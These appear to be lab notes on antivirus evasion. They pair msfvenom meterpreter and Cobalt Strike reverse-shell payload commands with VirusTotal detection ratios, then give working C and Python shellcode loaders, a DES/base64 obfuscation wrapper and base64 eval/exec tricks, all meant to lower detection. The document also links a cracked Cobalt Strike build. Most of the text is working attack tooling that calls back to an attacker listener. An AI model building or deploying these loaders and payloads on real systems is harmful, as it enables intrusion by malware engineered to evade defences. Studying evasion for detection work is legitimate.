Log of Anti-AntiVirus

Bypass 4 Fun — lab notes. Run these payloads only against hosts you are explicitly authorized to test, with LHOST/LPORT pointing at a listener you control. The VirusTotal ratios below are point-in-time observations (engine count and verdicts change daily) and will not reproduce exactly.

Payload | VirusTotal (detections / engines, at the time of testing) | Remark
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.103 LPORT=9876 -f exe > Bufferfly.exe 53/69
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 16 LHOST=192.168.56.103 LPORT=9876 -f exe > Bufferfly.exe 52/69
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.103 LPORT=9876 -f c > Bufferfly.c 20/69 Visual Studio编译生成32位可执行程序
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 16 LHOST=192.168.56.103 LPORT=9876 -f c > Bufferfly.c 13/69 Visual Studio编译生成32位可执行程序
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.56.103 LPORT=9876 -f py > Bufferfly.py 23/69 Payload需要与Python版本相匹配 (note: the original command had a bare `-e` before `LHOST=`; `-e` takes an encoder name, so as written it would consume `LHOST=…` as the encoder and the command does not do what this row implies — either drop `-e` as shown here or pass a real x64 encoder name)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.56.103 LPORT=9876 -f py > Bufferfly.py (the bare `-e` in the original command is dropped here — it expects an encoder name and would otherwise swallow `LHOST=…`)
DES
15/70 Payload需要与Python版本相匹配
pyinstaller -F -w -p PATH_TO_PACKAGE shellcode.py
(Cryptodome)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.56.103 LPORT=9876 -f py > Bufferfly.py (the bare `-e` in the original command is dropped here — it expects an encoder name and would otherwise swallow `LHOST=…`)
DES BASE64
11/69 Payload需要与Python版本相匹配
pyinstaller -F -w -p PATH_TO_PACKAGE shellcode.py
(Cryptodome)
CobaltStrike
windows/beacon_http/reverse_http
x86 EXE
50/67
CobaltStrike
windows/beacon_http/reverse_http
x86 C
27/70 Visual Studio编译生成32位可执行程序
CobaltStrike
windows/beacon_http/reverse_http
x64 Python
23/68 Payload需要与Python版本相匹配
CobaltStrike
windows/beacon_http/reverse_http
x64 Python DES BASE64
10/68 Payload需要与Python版本相匹配
pyinstaller -F -w -p PATH_TO_PACKAGE shellcode.py
(Cryptodome)
#include <stdio.h>
#include <Windows.h>
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
/* Placeholder: replace with the raw shellcode bytes emitted by `msfvenom -f c`
 * (or the Cobalt Strike C export). Because this is a string literal, the array
 * carries a trailing NUL, so sizeof(buf) in main() is one byte larger than the
 * shellcode itself. */
unsigned char buf[] = "shellcode";
/* Entry point: copies `buf` into a freshly allocated RWX region and jumps to it.
 * This executes whatever machine code is in `buf` inside this process --
 * authorized lab use only.
 *
 * NOTE(review): `main()` with no return type relies on implicit int, which
 * C99-and-later compilers warn on or reject; `int main(void)` is the portable form.
 * NOTE(review): VirtualAlloc returns NULL on failure and that is never checked,
 * so an allocation failure becomes a NULL-deref crash in memcpy rather than an error.
 * NOTE(review): memcpy is used without including <string.h>; MSVC appears to
 * tolerate this through Windows.h / intrinsics -- TODO confirm on the target toolchain. */
main()
{
/* One region of sizeof(buf) bytes (shellcode + the literal's NUL), committed and
 * reserved in one call, readable/writable/executable. */
LPVOID shellcode = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(shellcode, buf, sizeof(buf));
/* Reinterpret the region as a no-argument function and call it. Whether control
 * ever returns here depends entirely on the shellcode. */
((void(*)())shellcode)();
}
import ctypes
# Minimal ctypes shellcode loader (Windows only: ctypes.windll). It allocates an
# RWX region, copies the bytes in, and runs them on a new thread -- i.e. it
# executes arbitrary machine code in this process. Authorized lab use only.
#
# Placeholder: replace with the bytes emitted by `msfvenom -f py`. Per the table
# above, the payload's bitness must match the interpreter that runs this script.
buf = b"shellcode"
# Mutable copy so a writable C buffer can be created over it below.
shellcode = bytearray(buf)
# ctypes defaults restype to a 32-bit int; VirtualAlloc returns a pointer, which
# would be truncated on 64-bit Windows without this.
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
# 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE (the same flags
# the C loader uses by name). NOTE(review): a NULL (0) return is not checked
# before the pointer is used below.
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40))
# C char array sharing memory with `shellcode` (no copy), used as the source buffer.
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
# Copy the bytes into the RWX region.
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),buf,ctypes.c_int(len(shellcode)))
# Start a thread whose start address is the shellcode. NOTE(review): CreateThread's
# restype is left at the default c_int, so on x64 the returned HANDLE is truncated
# to 32 bits here and re-wrapped as c_int below; this typically works because
# handle values are small, but declaring restype/argtypes as c_void_p is correct.
handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
# -1 == INFINITE: keep the process alive until the shellcode thread exits.
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))
#encrypt.py
from Cryptodome.Cipher import DES
import base64
# Placeholder: the raw shellcode bytes (msfvenom -f py / Cobalt Strike Python export).
buf = b"shellcode"
# 8-byte DES key. It is hard-coded here AND in shellcode.py, so this step only
# changes the bytes that sit on disk; it provides no confidentiality (anyone with
# the loader has the key) and DES-ECB is not a secure cipher in any case.
key = b'DEADC0DE'
des = DES.new(key, DES.MODE_ECB)
# Zero-pad up to the 8-byte DES block size. When len(buf) is already a multiple
# of 8 this appends a full block of zeros (pad is never empty); the loader strips
# the padding again by slicing to `length`, not by inspecting the bytes.
pad = (8 - len(buf) % 8) * b"\x00"
b64code = base64.b64encode(des.encrypt(buf + pad))
# Paste the first value into shellcode.py as `b64code` and the second as `length`;
# the decrypt side slices to exactly this many bytes, so they must come from the
# same run.
print(b64code)
print(len(buf))
#---------------------------
#shellcode.py
from Cryptodome.Cipher import DES
import base64
import ctypes
# Loader counterpart of encrypt.py: base64-decode, DES-ECB-decrypt, strip the
# zero padding, then run the bytes exactly as the plain ctypes loader above does.
# Windows only (ctypes.windll); executes arbitrary machine code in-process --
# authorized lab use only.
#
# Placeholder: the base64 string printed by encrypt.py.
b64code = b"base64code"
# Must equal the len(buf) printed by encrypt.py for the same shellcode. If it is
# too small the shellcode is silently truncated; if too large, padding zeros are
# appended to it -- there is no other integrity check on the decoded bytes.
length: int = 510
# Same hard-coded key as encrypt.py; see the note there -- this is obfuscation of
# the on-disk bytes, not encryption in any meaningful security sense.
key: bytes = b"DEADC0DE"
des = DES.new(key, DES.MODE_ECB)
buf = des.decrypt(base64.b64decode(b64code))[:length]
shellcode = bytearray(buf)
# VirtualAlloc returns a pointer; the default c_int restype would truncate it on x64.
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
# 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
# NOTE(review): a NULL (0) return is not checked before use.
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),buf,ctypes.c_int(len(shellcode)))
# The two commented lines below are the base64 of the RtlMoveMemory call and of
# the `handle = CreateThread(...)` assignment, respectively -- the eval/exec
# variant referenced in the links at the end of the page. The first is an
# expression, so eval() works; the second is an assignment, which eval() cannot
# evaluate, hence exec(). Either way this is executing code decoded from data:
# keep the blob in the file, never load it from anywhere external.
#eval(base64.b64decode("Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX3VpbnQ2NChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpKQ=="))
# NOTE(review): CreateThread's restype is the default c_int, so the 64-bit HANDLE
# is truncated here and re-wrapped as c_int below; typically works because handle
# values are small, but c_void_p would be correct.
handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
#exec(base64.b64decode("aGFuZGxlID0gY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5DcmVhdGVUaHJlYWQoY3R5cGVzLmNfaW50KDApLGN0eXBlcy5jX2ludCgwKSxjdHlwZXMuY191aW50NjQocHRyKSxjdHlwZXMuY19pbnQoMCksY3R5cGVzLmNfaW50KDApLGN0eXBlcy5wb2ludGVyKGN0eXBlcy5jX2ludCgwKSkp"))
# -1 == INFINITE: keep the process alive until the shellcode thread exits.
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))

[Python]執行pyinstaller產生的執行檔出現No module錯誤訊息
python3 shellcode 使用eval函数 bypass AV
对于python中eval函数不能执行赋值操作的解决方法
实验使用 C 编译 shellcode 免杀上线
python3的Cryptodome
Cobalt Strike系列教程第一章:简介与安装
CS teamserver.bat
Cobalt Strike 4.3破解版 (cracked build — supply-chain caution: pirated Cobalt Strike builds circulating online have repeatedly been found trojanized or backdoored; a team server and client you did not build from a licensed source should be treated as untrusted code)